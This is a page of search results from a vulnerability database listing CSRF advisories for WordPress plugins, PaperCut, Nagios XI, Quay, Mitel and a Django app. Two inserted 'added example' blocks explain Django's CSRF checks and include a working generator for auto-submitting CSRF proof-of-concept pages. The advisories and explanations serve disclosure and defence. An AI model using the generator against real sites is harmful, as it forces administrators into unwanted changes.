1834 matches found
Order Delivery Date for WP e-Commerce <= 1.2 - Settings Update via CSRF
Description The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack...
Make Paths Relative <= 1.3.0 - Settings Update via CSRF
Description The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack...
Futurio Extra < 1.9.1 - Arbitrary Plugin Activation via CSRF
Description The plugin does not have a CSRF check when activating plugins, which could allow attackers to make logged-in admins perform such an action via a CSRF attack...
MailMunch – Grow your Email List < 3.1.3 - Settings Update via CSRF
Description The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack...
Remove/hide Author, Date, Category Like Entry-Meta <= 2.1 - Settings Update via CSRF
Description The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack...
Table of Contents Plus < 2309 - Settings Update via CSRF
Description The plugin does not have a CSRF check in place when updating its settings, which could allow attackers to make a logged-in admin change them via a CSRF attack...
Optimize Database after Deleting Revisions <= 5.1 - Database Optimization via CSRF
Description The plugin does not have a CSRF check when starting the database optimization process, which could allow attackers to make logged-in admins perform such an action via a CSRF attack...
CSRF on marking an admin task as complete
Description A data-altering action is performed via a GET request in AdminTaskToggleDoneView, making it vulnerable to a CSRF attack. In Django, GET is treated as a safe method and is not protected by the CSRF middleware. Proof of Concept (python) class AdminTaskToggleDoneView(LoginRequiredMixin,...
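To make the Django point concrete, here is an added example (not code from the report above or from Django itself): a simplified model of what CsrfViewMiddleware enforces, a task-toggle view that mutates state on GET, and the same view restricted to POST. The request/response shapes, the task store, and the URL path in the comments are constructed for illustration; real Django masks the token and also checks Origin/Referer on HTTPS, which this model omits.

```python
# Added example: why a state-changing GET view slips past Django-style CSRF checks.
# Names (Request, csrf_check, toggle_done_*) are invented for this illustration.
from dataclasses import dataclass, field
import secrets

# Methods Django's CsrfViewMiddleware never checks (RFC 9110 "safe" methods).
SAFE_METHODS = {"GET", "HEAD", "OPTIONS", "TRACE"}


@dataclass
class Request:
    method: str
    cookies: dict = field(default_factory=dict)   # sent by the browser automatically
    form: dict = field(default_factory=dict)      # body fields the attacker controls
    headers: dict = field(default_factory=dict)


def csrf_check(request: Request) -> bool:
    """True if the request may proceed. Safe methods are waved through; unsafe
    methods need a submitted token equal to the csrftoken cookie (simplified)."""
    if request.method in SAFE_METHODS:
        return True
    cookie_token = request.cookies.get("csrftoken", "")
    sent = request.form.get("csrfmiddlewaretoken") or request.headers.get("X-CSRFToken", "")
    if not cookie_token or not sent:
        return False
    return secrets.compare_digest(cookie_token, sent)


TASKS: dict = {}  # constructed in-memory stand-in for the admin task table


def reset_tasks() -> None:
    TASKS.clear()
    TASKS[1] = {"title": "rotate API keys", "done": False}


def toggle_done_vulnerable(request: Request, task_id: int) -> int:
    """Vulnerable pattern: the toggle runs on GET, so the CSRF check is skipped."""
    if not csrf_check(request):
        return 403
    TASKS[task_id]["done"] = not TASKS[task_id]["done"]
    return 200


def toggle_done_fixed(request: Request, task_id: int) -> int:
    """Fixed pattern: refuse safe methods for state changes (what require_POST does),
    so the token check actually applies."""
    if request.method != "POST":
        return 405
    if not csrf_check(request):
        return 403
    TASKS[task_id]["done"] = not TASKS[task_id]["done"]
    return 200


def run_scenarios() -> dict:
    """Replay a cross-site attack against both views; returns (status, task_done) per case."""
    token = secrets.token_hex(16)
    victim_cookies = {"sessionid": "s3ss10n", "csrftoken": token}
    results = {}

    # 1. Attacker lures the admin into a top-level GET to /admin/tasks/1/toggle (a link or
    #    redirect). SameSite=Lax cookies ARE sent on top-level cross-site GET navigations.
    reset_tasks()
    cross_site_get = Request("GET", cookies=victim_cookies)
    results["vuln_get"] = (toggle_done_vulnerable(cross_site_get, 1), TASKS[1]["done"])

    # 2. Same GET against the fixed view: refused before any state change.
    reset_tasks()
    results["fixed_get"] = (toggle_done_fixed(cross_site_get, 1), TASKS[1]["done"])

    # 3. Attacker auto-submits a cross-site POST form: cookies present (assumes the session
    #    cookie is not SameSite=Lax/Strict), but the token value is unknown to the attacker.
    reset_tasks()
    cross_site_post = Request("POST", cookies=victim_cookies, form={"csrfmiddlewaretoken": "guess"})
    results["fixed_post_bad_token"] = (toggle_done_fixed(cross_site_post, 1), TASKS[1]["done"])

    # 4. Legitimate same-site POST rendered with {% csrf_token %}: token matches the cookie.
    reset_tasks()
    same_site_post = Request("POST", cookies=victim_cookies, form={"csrfmiddlewaretoken": token})
    results["fixed_post_ok"] = (toggle_done_fixed(same_site_post, 1), TASKS[1]["done"])
    return results


if __name__ == "__main__":
    for name, (status, done) in run_scenarios().items():
        print(f"{name:22s} status={status} task_done={done}")
```

The GET case is the one the advisory describes: no token is ever consulted, and because the browser attaches cookies to top-level navigations even under SameSite=Lax, the admin's session is enough. Moving the mutation behind POST is what lets the middleware's token comparison do its job.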
CSRF Delete Categories
Description CSRF Delete Categories. Proof of Concept: 1. Attacker sends a forged request to the user: history.pushState('', '', '/'); document.forms[0].submit(); 2. User clicks and deletes unwanted categories. Payload PoC https://drive.google.com/file/d/12cCzI-b9KLCRlND6MmjM6j-DJfTJiIt/view?usp=sharing Video PoC...
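The two JavaScript fragments quoted in that entry are the standard skeleton of an auto-submitting CSRF proof-of-concept page. As an added example (not the report's own payload, whose target and fields are not reproduced here), the following generator builds such a page for any form-based endpoint; the target URL and field names in the usage are constructed.

```python
# Added example: generate the classic auto-submitting CSRF PoC page
# (history.pushState to hide the PoC URL, document.forms[0].submit() to fire it).
import html


def csrf_poc(action: str, fields: dict, method: str = "POST") -> str:
    """Return an HTML page that submits `fields` to `action` as soon as it loads.
    Only POST and GET are meaningful for a plain HTML form."""
    if method not in ("POST", "GET"):
        raise ValueError("HTML forms only submit POST or GET")
    # Escape names/values so attacker-chosen data cannot break out of the attributes.
    inputs = "\n".join(
        f'    <input type="hidden" name="{html.escape(str(k), quote=True)}" '
        f'value="{html.escape(str(v), quote=True)}" />'
        for k, v in fields.items()
    )
    return f"""<html>
  <body>
  <script>history.pushState('', '', '/')</script>
    <form action="{html.escape(action, quote=True)}" method="{method}">
{inputs}
      <input type="submit" value="Submit request" />
    </form>
    <script>document.forms[0].submit();</script>
  </body>
</html>"""


if __name__ == "__main__":
    # Constructed target and parameters for a category-deletion endpoint.
    print(csrf_poc("https://target.example/admin/categories/delete", {"id": "7", "confirm": "1"}))
```

If the victim's session cookie carries SameSite=Lax or Strict, the browser withholds it on the cross-site POST and this page does nothing; the GET variant (`method="GET"`) still rides along with Lax cookies on a top-level navigation, which is exactly why state changes over GET, as in the Django entry above, are the worst case.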
CVE-2023-2508
The PaperCutNG Mobility Print version 1.0.3512 application allows an unauthenticated attacker to perform a CSRF attack on an instance administrator to configure the client host in the "configure printer discovery" section. This is possible because the application has no protections against CSRF...
Cross site request forgery (csrf)
The PaperCutNG Mobility Print version 1.0.3512 application allows an unauthenticated attacker to perform a CSRF attack on an instance administrator to configure the client host in the "configure printer discovery" section. This is possible because the application has no protections against CSRF...
CVE-2023-2508 CSRF in PaperCutNG Mobility Print leads to sophisticated phishing
The PaperCutNG Mobility Print version 1.0.3512 application allows an unauthenticated attacker to perform a CSRF attack on an instance administrator to configure the client host in the "configure printer discovery" section. This is possible because the application has no protections against CSRF...
CVE-2023-2508
PaperCutNG Mobility Print 1.0.3512 is affected by a CSRF vulnerability that allows an unauthenticated attacker to make an instance administrator configure the client host via the Configure printer discovery section. The root cause is lack of CSRF protections (no Anti-CSRF tokens, header origin va...
PT-2023-7784 · Nagios · Nagios Xi
Name of the Vulnerable Software and Affected Versions: Nagios XI, affected versions not specified. Description: The issue stems from missing CSRF protection on web pages of the Nagios XI monitoring tool. A remote attacker can exploit this to perform a CSRF attack...
CVE-2023-4959
A flaw was found in Quay. Cross-site request forgery (CSRF) attacks force a user to perform unwanted actions in an application. During the pentest, it was detected that the config-editor page is vulnerable to CSRF. The config-editor page is used to configure the Quay instance. By coercing the...
CVE-2023-39285
A vulnerability in the Edge Gateway component of Mitel MiVoice Connect through 19.3 SP3 (22.24.5800.0) could allow an unauthenticated attacker to perform a Cross Site Request Forgery (CSRF) attack due to insufficient request validation. A successful exploit could allow an attacker to provide a modifi...
Cross site request forgery (csrf)
A vulnerability in the Connect Mobility Router component of Mitel MiVoice Connect through 9.6.2304.102 could allow an unauthenticated attacker to perform a Cross Site Request Forgery (CSRF) attack due to insufficient request validation. A successful exploit could allow an attacker to provide a...
CVE-2023-39286
A vulnerability in the Connect Mobility Router component of Mitel MiVoice Connect through 9.6.2304.102 could allow an unauthenticated attacker to perform a Cross Site Request Forgery (CSRF) attack due to insufficient request validation. A successful exploit could allow an attacker to provide a...
CVE-2023-4318
The Herd Effects WordPress plugin before 5.2.4 does not have a CSRF check when deleting its items, which could allow attackers to make logged-in admins delete arbitrary effects via a CSRF attack...